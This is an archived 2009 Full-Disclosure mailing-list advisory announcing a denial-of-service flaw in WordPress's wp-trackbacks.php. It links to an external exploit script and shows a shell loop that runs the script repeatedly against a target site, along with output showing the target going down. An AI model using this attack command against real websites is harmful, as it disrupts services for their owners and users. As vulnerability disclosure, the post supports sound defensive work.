| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <4ADC52C2.6090708@zerial.org> Date: Mon, 19 Oct 2009 08:51:30 -0300 From: "Zerial." <fernando@...ial.org> To: full-disclosure@...ts.grok.org.uk Subject: [Wordpress] Resource Exhaustion (Denial of Service) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 jcarlosn [http://rooibo.wordpress.com/] has discovered an Denial of Service by Resource Exhaustion in all wordpress version. This vulnerability affects the wp-trackbacks.php file and already exists an available exploit for it. The exploit: http://codes.zerial.org/php/wp-trackbacks_dos.phps Execution: $ while /bin/true; do php test.php http://target.bom/wordpress; done hit! hit! hit! hit! hit! hit! hit! hit! hit! hit! Notice: fputs(): send of 8192 bytes failed with errno=11 Resource temporarily unavailable down!! Load average: 22.07, 15.18, 8.58 (on target server) - -- Fernando A. Lagos Berardi - Zerial Desarrollador y Programador Web Seguridad Informatica Linux User #382319 Blog: http://blog.zerial.org Skype: erzerial Jabber: zerial@...beres.org GTalk && MSN: fernando@...ial.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkrcUsIACgkQIP17Kywx9JQnNQCeOwPir0lZxguy8d4LDmNzKxD8 CyYAoJEEAaoyOnE09VbVRveUQU7Uapcq =pFaY -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists